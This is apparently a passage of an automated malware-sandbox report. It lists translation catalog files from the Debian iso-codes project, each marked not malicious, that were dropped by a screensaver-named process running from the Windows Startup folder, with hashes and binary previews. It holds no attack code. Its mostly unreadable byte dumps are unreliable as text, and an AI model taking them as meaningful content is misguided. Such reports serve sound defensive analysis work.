                                                                                                    SSDEEP:384:snboRT6k+bR/vyUXs4zmwZbjh5wsWP4XWAIziUGqbaJeNRDpgNJpPszc:sxZZzmotmsWP4XWAItOJ2DpgNJZD
                                                                                                    MD5:C6B31171A973F8B5EA1B8EA828893A6A
                                                                                                    SHA1:B3FA21AC8885E7623ED90884FA58D773B2CD5409
                                                                                                    SHA-256:AA083F1F372A8DA40807A1D8CA77A767B61AD4FA89B7639B5C16CF567C5197AF
                                                                                                    SHA-512:9911BB4991A08A59DC895590D77C6A70B256FF0AA30552FEDA3CCCF8E2DCF1CC822C9F78B6C2CB5DE2D4172A4A54FCE8897D7AAD17008990544DCAC319783DD7
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):5.162886869599114
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijn1YYxAgCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITG1WNsXmBQ8KMW0YEi9:i4n1xx8t02Ukx/iximCg5ITOIsXmBQWk
                                                                                                    MD5:615F071E3DCC6A78653334EFACBDF0F5
                                                                                                    SHA1:E48A6661732557CCB56BB9711A3D9BDBB15389E4
                                                                                                    SHA-256:E2CE734745E1A40BB0F929D7A5AA0915492DF63577602BF2476A61755608EC0A
                                                                                                    SHA-512:477B5C0AE6E9640562106212B49FCA696C3ECD0DA4B9A0216F3CB5AC500CDCA7E27B2D00A6C347E2925A78EBA153C91249F0C42563C09EED30442AC284E31E90
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...:...9................Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: sq.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 30 messages, Project-Id-Version: iso_3166-3 'Territoret Britanike t\303\253 Antarktikut'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2664
                                                                                                    Entropy (8bit):5.2273459799486
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ej6JmE/7EvxqIfdvqNuoUsOIn2l92J22QolMsl+2LRI5rjNM4SrO:hkwE1BooIn4sJMspLRI9t
                                                                                                    MD5:A600AF2C1B44A90D58A3AFAA31DFBD06
                                                                                                    SHA1:4F04AE6E21F40C7F20F168287E60E66D13AD9A87
                                                                                                    SHA-256:4EC49E4B462ADF45434E291D27624097B978AA2286720DA7A2B635607BA82763
                                                                                                    SHA-512:74A39C7EB8CB0162D94B4DB8FF9DE6B3DFF9D0FF854B443508E4A394A832AE7A073ECEA5FD364DE4BC47CA4584C026FE9EE2EC40E1150420AA398812A33DC944
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*.............../.../......._.......g.......r...........)...................................................2.......?...!...L.......n........................... .......)............... ...........4...2...@.......s...........$...Y...)...~...)...............1...........".......*.......8.......N...(...e...........................................................%...........8.......U.......h.......o...,.......1....... ....... ........... ...(...,.......U........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territories.German Democratic Republic.Gilbe
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_4217
                                                                                                    Category:dropped
                                                                                                    Size (bytes):370
                                                                                                    Entropy (8bit):5.162396235129308
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijLYYxkXCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITG1WNsXmBQ8KMW0YEi9:i4LxxRt02Ukx/iximCg5ITOIsXmBQWi9
                                                                                                    MD5:3617B5AFEBE12AB0BC9BC69455C45F6C
                                                                                                    SHA1:477E38B61B98B7DAF76F073F952303F717A1EE9B
                                                                                                    SHA-256:5ED87D0C4DFD05E9B10C7D378EB83CF3AF7928D8AB06A15A8DA76EF9F6D4DBFD
                                                                                                    SHA-512:046526D24E1E3D9A7F5775068A98C12613B560B2223EFE45EA468B787D96E5F0C0588C7AE299663AA96253A074A9A5600A3AB70AC40C435B2FA9018C6EDB65CF
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...8...9................Project-Id-Version: iso_4217.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: sq.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_639-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):5.155862310475688
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijcYYxq7HCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITG1WNsXmBQ8KMW0YEi9:i4cxxq7it02Ukx/iximCg5ITOIsXmBQV
                                                                                                    MD5:6460148501EDBF66587A1850CFA3E855
                                                                                                    SHA1:2690AB6E572E376BF0B3D3FBE3A8D3FB2BC73B0B
                                                                                                    SHA-256:DE62FFECD7650F6957E2AD3F3836EBD758943AEB7BAD40EFC917D1169CFDE199
                                                                                                    SHA-512:6079FF24121E6F71642EB8BDD13E99B29A237CFD403040902D3F05FC9531C53C3F56BC90A22D30535A8EFDD2D7B00594B759892CDE189E8A8C972AAF2C2A714E
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...9...9................Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: sq.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 61 messages, Project-Id-Version: iso_639-5 'Gjuh\303\253 afroaziatike'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3810
                                                                                                    Entropy (8bit):4.868884714479862
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:5q3GMhqqye6dbK2U7ayDu3KK0UL30ULf+qadXQvhr/CUJhT6YIkRQONgxr9F6:0WM0F5R0E0C+fIC0hT6YIkRXM9o
                                                                                                    MD5:7674B439B8F3830367523024C07E0533
                                                                                                    SHA1:997AF8C5CEDCC3C2B6EEBCA469373B237E3FC093
                                                                                                    SHA-256:73FEA78059FDEC8562FB36E1478A258DF9C086983F8D88C9ADE3C8567B98D7C6
                                                                                                    SHA-512:DA1B83856067F101542FCD394E23FD1FBB1E68B2CB4841203B65D3A83004FEF241B94B025051D225B13761EE77CD293CF702590827A7757064E9F4336AF9C01F
                                                                                                    Malicious:false
                                                                                                    Preview:........=...........S...........8.......9.......P.......e.......v.......................................................................!.......2.......C.......W...!...h...................%...........................................&.......4.......D.......\.......n.......................................................................................:.......Q.......q...............................................................................).......:.......K.......].......o.......}...........................9...................................-.......;.......N.......^.......q...................................................................%...........".......1...#...D.......h.......w....................................................................................... ...............<.......H.......X.......e.......t...........$...........................................................(.......7.......E.......U.......j.......u.......................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10451
                                                                                                    Entropy (8bit):5.02234227533195
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dHclkPR3wGjcAbXwltU4WjV9qWxa5hW855Xo78/ZJh0JcbC:FcmPR3wGXXwg4WjVDxa5hW855X13h0Jd
                                                                                                    MD5:6E8E0A1ACFF5A45AD6FB6D4A5C01F3DA
                                                                                                    SHA1:780B0CD0E0A6F9130E6921C412E323ADDF5F538B
                                                                                                    SHA-256:B30EB24384BF305765FE2F86CBD90A2D7C098AC03F57890AFF9460492254C3CF
                                                                                                    SHA-512:242086549AFFA6A0ADA8F668866E295A7F73B47679FB577D2B89D1EA701816E812C8CD2E426F7977B71FCEDBAA1F767031F6147DBD8ACA405305E5B5E7AB899F
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 'Avganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23246
                                                                                                    Entropy (8bit):5.045578954055911
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jhl7o5a/D+8OuJOKV4/Ubjh5wsWP4XdAIzirGssBm8hkkwInC7Pcs:jhZSjKV4ItmsWP4XdAILh8i+
                                                                                                    MD5:0D7E65EBE68124C8C32AB5F6C55875E2
                                                                                                    SHA1:D0F0B90635C4529BC2BF91B639E99D9327CC3F33
                                                                                                    SHA-256:990877402C7034989707FE34B09455384EA67C588EEF72971C11674336433101
                                                                                                    SHA-512:3EBA67F02F97C5E240C2C0683F9A99086E9EBC5F3DD5FE683217AB9AA19BAC09BDA7F226723768815A2B23A0468BA4E571B9CA8BA229D6DC5F7A9C5B618A8A08
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2961 messages, Project-Id-Version: iso_3166-2 'Eva'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):121630
                                                                                                    Entropy (8bit):5.128105960008055
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:jNKKf3jNuFbIBbFkI8ClypNqTQ7KGP615es7Oavs2b5FuUcYx3mg:pKSQhiTl/m6109aUAovYx3n
                                                                                                    MD5:540CA9B22149C3688036B7D0E0979A02
                                                                                                    SHA1:AA908EA7C8E8583EA7B712A90E290AD085A69FD2
                                                                                                    SHA-256:8E85AE3DA5E61A4B629AE3D2AC47898C361664CA1C4C01CD0617AFE07C723A4D
                                                                                                    SHA-512:DBF239521D6DA964A0B5DC98F4EC8E3D6312B24D02313874F64144137901D80E3B225D332F953C8ECF518FBEEFCF8AD1A5E3B7C015828894F2721B719F585E79
                                                                                                    Malicious:false
                                                                                                    Preview:.................\......,.......(.......)...............4.......<.......C.......Q......._.......d.......i.......r.......w...............................................................................................................................................".......3.......B.......G.......S.......Y.......g.......m.......z....................................................................................................................................................... .......*.......4.......B.......M.......[.......h.......p.......x.......................................................................................................................................................#.......,.......;.......D.......K.......Q.......Z.......a.......i.......p.......w...............................................................................................................................*.......6.......D.......L.......Y.......c.......k.......w.......................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Britanska Antarkti\304\215ka Teritorija'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2709
                                                                                                    Entropy (8bit):5.281058910844995
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADNkBTpleEnvGqIfdvqNuoU2EjupWDjtkopTI5i0aWFfiIoxaYHYl:qDmPyBouuakxU03jUxI
                                                                                                    MD5:38C4B446A454962489F6013ABE864B3D
                                                                                                    SHA1:D00A1A13E2B3921A982591075A3DA23DCDD0E937
                                                                                                    SHA-256:DB3952EC2446A22E1006A810757D557D43180F514C2BD110EAA6DC75B156552D
                                                                                                    SHA-512:3E86D41B037D9399ABD925470BA8037EF2A75C186EBB5C36DA76A1EC3259EAD39B3DFDD95A45532A509A4D50C8C8DA6B1D3CFE8D3E31E9BFE1D2818C03B8149A
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................!.......&.......3...............8... .......Y.......a.......t...................*................................... ...............?.......N...'...[...........................................1...................'.......G...1...S................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 149 messages, Project-Id-Version: iso_4217 'ADB obra\304\215unska jedinica'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7652
                                                                                                    Entropy (8bit):4.85782804114856
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:qfbCmwZX5qaLMjlaWBgUCS/6zcwsikNRU3s:qfZVp1BbrCz8HRU3s
                                                                                                    MD5:BA6DDF1B531E7ECA34D00EFFA58637B4
                                                                                                    SHA1:A12EE0276853555CCEB0855980AF7000AD04E02C
                                                                                                    SHA-256:C05F4B42D93BEA63F1B61BA32CBEA244390188FCE31F9B32EF865CFFBFEBA085
                                                                                                    SHA-512:854BF12A4A7BA925E3CDDB1F274F509B01C249E35C3CF8A1015ACA72582C0E3AA4362D541571EE2D0760DEBA7BBD4C238E4F98D8E2201BCDF4030FD324BBE242
                                                                                                    Malicious:false
                                                                                                    Preview:........................l...............................................................................................................,.......=.......G.......V.......d.......r...............................................................................................$.......1.......8.......E.......K.......Z.......`.......o.......t...............................................................................................................&.......7.......?.......M.......Z.......g.......s...............................................................................................................................................).......;.......K.......X.......e.......u.......................................................................................................+.......5.......<.......J.......Z.......c.......r.......w...............................................................................................................................-.......D.......H.......X.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 349 messages, Project-Id-Version: iso_639-3 'abkaski'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14420
                                                                                                    Entropy (8bit):4.731558475272077
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:mFWj1htCz6VCLip0+z6XD7vAEFMrNMZCFKCPHarTAo:TQVP771T5
                                                                                                    MD5:2A254BC676EC86BE36423581A6F03A3F
                                                                                                    SHA1:FCC5AE7B263C5645F4BF2A404901795F14021EB6
                                                                                                    SHA-256:1113E2127438532425F6F153C3786802FA5BE2790E45AEF7F6A8EDCE41853002
                                                                                                    SHA-512:4457EF12D7E292F990FE3E3065D0CC5414AEF539AAB0A7D470853C36E7354EC28971FF4911726FCF111DA5F70EFA890F703A4F2FB30C32B9CB03841AB027D6AB
                                                                                                    Malicious:false
                                                                                                    Preview:........].......................8.......9.......C.......L.......R.......Z......._.......h.......r.......w....................................................................................................................................................................... .......%.......0.......8.......A.......G.......L.......T.......`.......h.......m.......t.......}...............................................................................................................................................................%.......6.......=.......E.......N.......S.......Y.......b.......h.......o.......v.......}........................................................................................................................ ....... ....... ....... ......# ......+ ......2 ......: ......> ......E ......N ......T ......W ......] ......b ......g ......p ......w ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 76 messages, Project-Id-Version: iso_639-5 'afro-azijski jezici'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5040
                                                                                                    Entropy (8bit):4.908121503787829
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:C+f02TTbr8DCnBK0E0Cj2FJcCkNrCCVLAYNet2QoFSv8KxexyeZhPlIoP:8EbrwCno0E0/FV+rsYc9oFSv8Kxexyev
                                                                                                    MD5:437F4C6E876EA86352F8CB8EC280A0A9
                                                                                                    SHA1:88AA0F3B67B92E62119ED0E08E29303CCF062A24
                                                                                                    SHA-256:DD9B60CD0A8E099E43A9A5375BDC7D627802ECF23BA29640475116A34A359F38
                                                                                                    SHA-512:A8A707C7C46FC11565A3A52723078DCFD6D04D7695265FEA37DD2084C4A996F1D60156B8D42B02A1A34ADEA71AAF7AB9DC6CF2B84A4807955B83B7717E3A4A6F
                                                                                                    Malicious:false
                                                                                                    Preview:........L.......|...e...........p.......q...............................................................................?.......R.......b.......r...................................!...............................%...*.......P.......c.......w.......................................................................4.......F.......Z.......l.......|...............................................................................8.......O.......o...............................................................................$.......;.......L.......].......o...............................................................................+.......:...............-.......A.......Q.......`.......r.......................................................................................>.......N...$...]...........................0...........................................G.......Z.......k.......................................................................................+.......>.......N.......Z.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 '\320\260\320\264\320\273\320\260\320\274'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12875
                                                                                                    Entropy (8bit):5.215522588790584
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dqnckAzIltU4WjV9qWxa5hW8W7Vdr3QvMn0GCl:4nszIg4WjVDxa5hW8W7VdTQvY0l
                                                                                                    MD5:C7989CE3365F908A5129CE9FAAD70E0B
                                                                                                    SHA1:6A014B599A76983526F6EE51280675A5CCF3411B
                                                                                                    SHA-256:798A3518A1A31DB2D09616A66E61D8A51BF0F17B16D1CC824D88A3CFC8796861
                                                                                                    SHA-512:4E0323F6F4C1548152612105A98AEF395064713C791E8C8502003935B0A3454DDD2B06BA3F11D94FA229132915B563BCB0F96B4F5002825F72CFCB48224C1AE1
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 '\320\220\320\262\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28915
                                                                                                    Entropy (8bit):5.227774975782007
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jhl7o5a/DvWYV4gr/Ubjh5wsWP4XdAIzirG9gYXiIKDWIPKQIyRzaxS:jhZq2DrItmsWP4XdAItgYXkPXRzag
                                                                                                    MD5:F71C7854BE296BE80CCECF524E00961E
                                                                                                    SHA1:69E43A7B3386358B8AEDBDFD8B76A86FDBFE7B1C
                                                                                                    SHA-256:BE012001C63CD5C8D8A872B8B6C00E63BEEF7525E9764F8EDE04691307109D7B
                                                                                                    SHA-512:7178789026A60158E7504F3B2FE02A40BC5450BD0975BADD123F610D77452E0D47DE95131C61E241515D68939C009DC4EB4C0ABD972C511A0074A8CD2E44078D
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2961 messages, Project-Id-Version: iso_3166-2 '\320\225\320\262\320\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):144341
                                                                                                    Entropy (8bit):5.333446802531706
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:jNKKf3jNu6CvH2NqamnClypNqTQ7KGP615eskU8vqE9huXBQ:pKSQkl/m610lTiE9EXS
                                                                                                    MD5:CEE43B1599F0554431B9AEB7F300C39A
                                                                                                    SHA1:3A67EAC53858D21B2A7672B280556E64BCBFE10C
                                                                                                    SHA-256:4DB2A2AC77DA6105ACCE116E1FE46D1542C7A0281F3A1347D888558EC1B3D48D
                                                                                                    SHA-512:C951BCB86157A899C28DDAA69027DCA99D713A56FBD28FDE5D3BCAEB0CABEDB377EA354BF300F0161B7CABD6CE317243F481ADF5BD04288499E54E3C2F13AA58
                                                                                                    Malicious:false
                                                                                                    Preview:.................\......,.......(.......)...............4.......<.......C.......Q......._.......d.......i.......r.......w...............................................................................................................................................".......3.......B.......G.......S.......Y.......g.......m.......z....................................................................................................................................................... .......*.......4.......B.......M.......[.......h.......p.......x.......................................................................................................................................................#.......,.......;.......D.......K.......Q.......Z.......a.......i.......p.......w...............................................................................................................................*.......6.......D.......L.......Y.......c.......k.......w.......................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\320\221\321\200\320\270\321\202\320\260\320\275\321\201\320\272\320\260 \320\220\320\275\321\202\320\260\321\200\320\272\321\202\320\270\321\207\320\272\320\260 \320\242\320\265\321\200\320\270\321\202\320\276\321\200\320\270\321\230\320\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3352
                                                                                                    Entropy (8bit):5.504943509328304
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADEQAdiLDfvGqIfdvqNuoU2IFSd1OMNctVmSDx7VByX:qDEqryBoKFE1O5VByX
                                                                                                    MD5:AD94A375D65D5F9FE0E08B6F16E8F606
                                                                                                    SHA1:80ABEB7D8159A9C9D9FBE02E140287C2FDEA7E71
                                                                                                    SHA-256:63DB03277DAD4F335B9779B938E93AD8321CF3A050FB1EB87D2DEBC822B87579
                                                                                                    SHA-512:00677CB36E29DF87EECE4A7483664EBE289A8ABAD98A6741C5B9153C5172355CAB07827B7A465250659C271B7CF83730C98DA0C9043554BE175DC55691344704
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................>.......F.......^......./...v...b............... ...........9...(...S...'...|...L.......8.......'...*.......R.......n...........................G.......&...$...!...K.......m.......x...1.......[.......)..."...;...L...........\....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 149 messages, Project-Id-Version: iso_4217 '\320\220\320\224\320\221 \320\276\320\261\321\200\320\260\321\207\321\203\320\275\321\201\320\272\320\260 \321\230\320\265\320\264\320\270\320\275\320\270\321\206\320\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9338
                                                                                                    Entropy (8bit):5.112742378413995
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:qfbCmwZXCoSO9LHgjlaWBgUCSQ1bl53BkMsTCAapL1jIKz27XCN6Ss:qfZEhLu1BbrubAeTLACsSs
                                                                                                    MD5:4EAB59EFED3F0DE7678E906FC1FF3330
                                                                                                    SHA1:03EFDC8C01D73D35302A091B8E6AAD5490A9FB36
                                                                                                    SHA-256:620A6B7FD62D451DCDF88FBC89A3BD726D8209AA6B76F0685A3A989C217AC276
                                                                                                    SHA-512:2F51DCE5A78F9C8291A171401450DDD6358D19C4CA1CAC3BDCA45E3556BE4EC8FF73FD3678EE7403F395BD261473DF48A5DDFD5A028B75871B8AEBD1414DE06C
                                                                                                    Malicious:false
                                                                                                    Preview:........................l...............................................................................................................,.......=.......G.......V.......d.......r...............................................................................................$.......1.......8.......E.......K.......Z.......`.......o.......t...............................................................................................................&.......7.......?.......M.......Z.......g.......s...............................................................................................................................................).......;.......K.......X.......e.......u.......................................................................................................+.......5.......<.......J.......Z.......c.......r.......w...............................................................................................................................-.......D.......H.......X.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 349 messages, Project-Id-Version: iso_639-3 '\320\260\320\261\320\272\320\260\321\201\320\272\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17095
                                                                                                    Entropy (8bit):4.996829825096291
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:mFWj1htC9ZgnQt67vAEFMrNMZCFV/Tjdvrlqb:TQDgnQs7a4
                                                                                                    MD5:8487662C28D2CA8E897A09B52C1EF620
                                                                                                    SHA1:84BE702645F845A8B7510A32DEB26CBB2645CCE5
                                                                                                    SHA-256:A574C7A2B8D6D3459113624C47947410F1B3FEFB13AC460859BDE82E7900A667
                                                                                                    SHA-512:1F52F36E792C36034FB3B93EAFF91BC8E10BBCE5D414ABF11483431B931927C99FE618FA2461B9F4CE93E7C92E94D30AF545E978A24FD5113CD80EA5A15E14AE
                                                                                                    Malicious:false
                                                                                                    Preview:........].......................8.......9.......C.......L.......R.......Z......._.......h.......r.......w....................................................................................................................................................................... .......%.......0.......8.......A.......G.......L.......T.......`.......h.......m.......t.......}...............................................................................................................................................................%.......6.......=.......E.......N.......S.......Y.......b.......h.......o.......v.......}........................................................................................................................ ....... ....... ....... ......# ......+ ......2 ......: ......> ......E ......N ......T ......W ......] ......b ......g ......p ......w ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 76 messages, Project-Id-Version: iso_639-5 '\320\260\321\204\321\200\320\276-\320\260\320\267\320\270\321\230\321\201\320\272\320\270 \321\230\320\265\320\267\320\270\321\206\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6247
                                                                                                    Entropy (8bit):5.142517398572794
